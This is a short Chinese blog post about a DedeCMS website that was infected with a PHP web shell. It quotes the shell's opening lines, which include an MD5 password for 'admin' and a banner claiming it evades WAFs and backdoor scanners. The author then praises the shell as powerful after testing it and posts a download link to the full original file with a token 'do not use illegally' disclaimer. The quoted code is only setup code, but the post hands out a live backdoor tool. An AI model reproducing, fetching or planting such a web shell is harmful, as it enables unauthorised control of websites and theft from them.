2020-02-16  点击量: 368

一个dedecms织梦做的网站被挂马了

木马的开始内容如下

 

Arno<?php 
error_reporting(E_ERROR);
header("content-Type: text/html; charset=gb2312");
ini_set('max_execution_time',100000);
ini_set('memory_limit','256M');
define('PASSWD','21232f297a57a5a743894a0e4a801fc3');/*默认是admin,MD5加密方式*/
define('VERSION','Bypass Waf Php Script(可绕过安全狗、360WAF、百度云、阿里云Waf、牛盾、云盾、以及冷门Waf、市面所有后门检测工具');
define('THISFILE',str_replace(array('','//'),array('/','/'),__FILE__));
define('THISDIR',dirname(THISFILE).'/');
define('ROOTDIR',strtr(THISFILE,array($_SERVER['PHP_SELF'] => '')).'/');

然后没有深究,只是把这个给删除处理

 

经测试这个木马文件挺强大的

 

 

挂马的原文件下载地址:

https://72k.us/file/16922972-422814100

请勿非法使用,谢谢。

 

评论已关闭!